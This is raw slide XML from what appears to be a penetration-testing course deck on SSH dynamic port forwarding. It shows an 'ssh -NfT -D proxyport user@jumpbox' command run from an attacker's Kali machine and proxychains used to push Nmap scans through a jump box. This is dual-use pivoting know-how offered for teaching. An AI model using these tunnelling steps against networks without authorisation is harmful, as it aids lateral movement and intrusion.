          <a:xfrm>
            <a:off x="6761000" y="1995727"/>
            <a:ext cx="6650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D2B">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Vic port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8315765-FF9E-4DEA-9266-86A57D58E25C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809155" y="1951877"/>
            <a:ext cx="27693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Remote host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78118325-388A-45EF-92F7-FCF1731BACCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7143721" y="3125211"/>
            <a:ext cx="4797321" cy="3214710"/>
            <a:chOff x="104775" y="2909091"/>
            <a:chExt cx="4797321" cy="3214710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AC02A-3E72-4906-A511-A82204C405A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="104775" y="2909091"/>
              <a:ext cx="4797321" cy="321471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23" name="Picture 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C40ACDD-A357-4280-A654-227670885766}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="477888" y="3430147"/>
              <a:ext cx="4051093" cy="2212442"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DE0D22-7322-49B2-AFA4-52F1A821B532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="97787" y="3756539"/>
            <a:ext cx="6821541" cy="2109021"/>
            <a:chOff x="5275209" y="3848311"/>
            <a:chExt cx="6821541" cy="2109021"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9CECED-DAEE-4410-92A5-020325A1F5E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275209" y="3848311"/>
              <a:ext cx="6821541" cy="1739689"/>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62F3413F-295F-4A03-8F79-C9E2B7DFCE76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5378611" y="4536368"/>
              <a:ext cx="6614733" cy="403895"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55F15471-6079-49B4-98B3-62D3A90B90C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177702" y="5588000"/>
              <a:ext cx="30165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Run from the JUMP box</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35762930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30FEB-1270-447D-8061-407B32DC91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B9D370-9F7C-4349-884D-58FE7402F4AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA91E8A-3591-4DEB-8759-F6FC19CB7106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Useful When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You want more than just a single port, like doing an Nmap scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most often done from the attacker machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> jump box</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48B222A8-3D8C-48A6-83CB-844190D3294D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2908288" y="2800350"/>
            <a:ext cx="6375424" cy="1885950"/>
            <a:chOff x="2787270" y="3400425"/>
            <a:chExt cx="6375424" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCB372CB-C768-4F36-9A14-8A3CE39ED061}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7276744" y="3400425"/>
              <a:ext cx="1885950" cy="1885950"/>
              <a:chOff x="5314594" y="2581275"/>
              <a:chExt cx="1885950" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{440BCD47-8661-4E58-9577-431526DE9FFF}"/>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8" name="Graphic 7" descr="Monitor with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA620D4-4D74-4DE2-8E82-07F873465F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9" name="Graphic 8" descr="Monitor with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8319C425-951E-461B-A990-9D9B5A5885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7270" y="3400425"/>
              <a:ext cx="1885950" cy="1885950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF199D16-1152-453B-BF15-17D128453910}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6962350" y="4059793"/>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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Graphic 16" descr="Target outline">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A79DE11-26AF-4951-A213-BBE5DF7049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519" y="3743143"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56835B38-E70E-4B80-9C03-4383B542349C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7640073" y="3868110"/>
              <a:ext cx="11592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ANY</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9B250BFD-7614-442E-9066-E86BE20BC673}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4822291" y="4242435"/>
              <a:ext cx="2032380" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">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6218907-5432-4848-93C6-97137F8C5869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1803129" y="4449866"/>
            <a:ext cx="8271347" cy="1885950"/>
            <a:chOff x="1803129" y="4449866"/>
            <a:chExt cx="8271347" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D911ABA9-8D71-44EB-94C5-099ACF4DBDC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1803129" y="4449866"/>
              <a:ext cx="8271347" cy="1885950"/>
              <a:chOff x="1803129" y="4428942"/>
              <a:chExt cx="8271347" cy="1885950"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4ADDE4C-DD54-4BF2-9686-81058EEA9DE1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1803129" y="4428942"/>
                <a:ext cx="8271347" cy="1885950"/>
                <a:chOff x="1606526" y="4354294"/>
                <a:chExt cx="8271347" cy="1885950"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="22" name="Group 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB39F08C-728E-46C8-B3E7-913D8FC85C3D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4794238" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="29" name="Rectangle 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5CF323-430C-4722-B542-3B8D0F60A4F5}"/>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0" name="Graphic 29" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E142A297-854E-40B6-AA15-70253B4D7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3" name="Graphic 22" descr="Monitor with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB3BE51-604C-4F8E-A70E-5101F90CB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6526" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="31" name="Group 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0ED67D-8AF0-4AA6-BF84-5BFC1B2B8FD2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="7991923" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="32" name="Rectangle 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8BA8B4-41A5-4A32-A6B4-FA6EB0F1487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33" name="Graphic 32" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7826BC-A726-43D1-9CFE-825BBC9CDE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94" y="2581275"/>
                    <a:ext cx="1885950" cy="1885950"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </p:spPr>
              </p:pic>
            </p:grpSp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Graphic 36" descr="Target outline">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85678B68-3F53-475F-875E-08644D3C66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4301" y="4792584"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Connector 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CA0E51-690B-4120-AA76-776066B6E1E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6841320" y="5280701"/>
              <a:ext cx="1382678" cy="19987"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent5">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4A7BD24-39A0-4FE2-93DF-EF8B7847EF34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8551855" y="4967528"/>
            <a:ext cx="11592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mn-cs"/>
              </a:rPr>
              <a:t>ANY</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13CF0995-340C-491B-BC23-C897A9F33F20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763013" y="5118382"/>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22</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DF9302-238C-4E1B-888E-A1B90158AC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604248" y="5298664"/>
            <a:ext cx="1189990" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">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0789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1BD62-8254-4B5F-A48F-3F6D2F16D3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3F75675-71A8-49E6-9E50-B22BF0EC4C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40758104-89AB-4CEC-8C52-0045D8D5DFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1442621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Run from the host you want access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (often Kali)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssh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NfT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proxyport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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user@jumpbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5E04BF-7708-450E-8FE9-5831C8E94D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4739235"/>
            <a:ext cx="7219952" cy="1205458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9525" marR="0" lvl="0" indent="-223838"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Configure </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cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Proxychains</a:t>
            </a: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 to match the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>proxyport</a:t>
            </a:r>
            <a:endPar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466725" marR="0" lvl="1" indent="-223838"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Send programs through the tunnel with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$&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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program.name </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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args</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6F19775-7A0F-4FD5-99F1-49EBB0A937E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8194736" y="4673075"/>
            <a:ext cx="3250496" cy="1148666"/>
            <a:chOff x="7342474" y="4439763"/>
            <a:chExt cx="4408049" cy="1557724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0407A2A1-DD63-4BA4-9E49-1315D2F6C2A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7355789" y="4439763"/>
              <a:ext cx="4394734" cy="1557724"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
